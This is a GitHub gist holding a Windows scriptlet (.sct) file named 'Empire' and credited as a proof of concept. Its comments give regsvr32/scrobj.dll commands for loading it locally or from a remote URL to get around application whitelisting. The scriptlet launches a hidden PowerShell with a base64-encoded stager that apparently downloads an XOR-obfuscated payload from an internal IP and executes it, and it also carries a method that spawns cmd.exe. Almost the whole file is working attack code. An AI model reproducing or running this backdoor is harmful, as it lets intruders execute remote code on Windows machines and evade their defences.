Skip to content

Instantly share code, notes, and snippets.

@MHaggis
Created January 28, 2017 15:47
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save MHaggis/31a1d0efd882d048436aeb7b9fd7f6d0 to your computer and use it in GitHub Desktop.
Save MHaggis/31a1d0efd882d048436aeb7b9fd7f6d0 to your computer and use it in GitHub Desktop.
<?XML version="1.0"?>
<scriptlet>
<registration
description="Empire"
progid="Empire"
version="1.00"
classid="{20001111-0000-0000-0000-0000FEEDACDC}"
>
<!-- regsvr32 /s /i"C:\Bypass\Backdoor.sct" scrobj.dll -->
<!-- regsvr32 /s /i:http://server/Backdoor.sct scrobj.dll -->
<!-- That should work over a proxy and SSL/TLS... -->
<!-- regsvr32 /s https://gist.githubusercontent.com/subTee/24c7d8e1ff0f5602092f58cbb3f7d302/raw/bf04e98329ef471dcbbe621df5d61ddb4e802b63/Backdoor.sct -->
<!-- regsvr32 /s /n /u /i:https://gist.githubusercontent.com/subTee/24c7d8e1ff0f5602092f58cbb3f7d302/raw/bf04e98329ef471dcbbe621df5d61ddb4e802b63/Backdoor.sct scrobj.dll -->
<!-- Proof Of Concept - Casey Smith @subTee -->
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("powershell.exe -NoP -sta -NonI -W Hidden -Enc WwBTAFkAUwB0AGUAbQAuAE4ARQB0AC4AUwBFAFIAVgBJAGMAZQBQAE8ASQBuAHQATQBBAG4AYQBHAEUAcgBdADoAOgBFAHgAUABFAEMAVAAxADAAMABDAE8ATgB0AEkAbgB1AGUAIAA9ACAAMAA7ACQAVwBjAD0ATgBlAHcALQBPAEIAagBFAEMAVAAgAFMAeQBzAFQAZQBNAC4ATgBlAFQALgBXAEUAYgBDAGwASQBFAE4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAFcAQwAuAEgARQBhAGQARQByAHMALgBBAGQARAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkAFcAQwAuAFAAUgBvAHgAeQAgAD0AIABbAFMAWQBzAFQARQBtAC4ATgBFAFQALgBXAGUAYgBSAEUAUQBVAEUAcwBUAF0AOgA6AEQARQBmAEEAVQBMAHQAVwBFAGIAUAByAE8AWABZADsAJABXAEMALgBQAHIAbwBYAHkALgBDAHIARQBkAEUAbgBUAEkAQQBMAHMAIAA9ACAAWwBTAFkAcwBUAGUATQAuAE4AZQBUAC4AQwByAEUAZABFAG4AdABJAGEAbABDAEEAYwBIAGUAXQA6ADoARABFAEYAQQBVAEwAVABOAEUAVAB3AE8AcgBrAEMAUgBlAGQAZQBOAHQAaQBBAGwAUwA7ACQASwA9ACcAOAAxAGQAYwA5AGIAZABiADUAMgBkADAANABkAGMAMgAwADAAMwA2AGQAYgBkADgAMwAxADMAZQBkADAANQA1ACcAOwAkAGkAPQAwADsAWwBjAEgAYQBSAFsAXQBdACQAQgA9ACgAWwBjAGgAYQByAFsAXQBdACgAJAB3AEMALgBEAE8AVwBOAEwATwBhAEQAUwBUAFIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEALgAxADgAMAA6ADgAMAA4ADAALwBpAG4AZABlAHgALgBhAHMAcAAiACkAKQApAHwAJQB7ACQAXwAtAGIAWABvAFIAJABLAFsAJABpACsAKwAlACQASwAuAEwAZQBOAGcAdABIAF0AfQA7AEkARQBYACAAKAAkAGIALQBqAE8AaQBuACcAJwApAA==");
]]>
</script>
</registration>
<public>
<method name="Exec"></method>
</public>
<script language="JScript">
<![CDATA[
function Exec()
{
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
}
]]>
</script>
</scriptlet>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment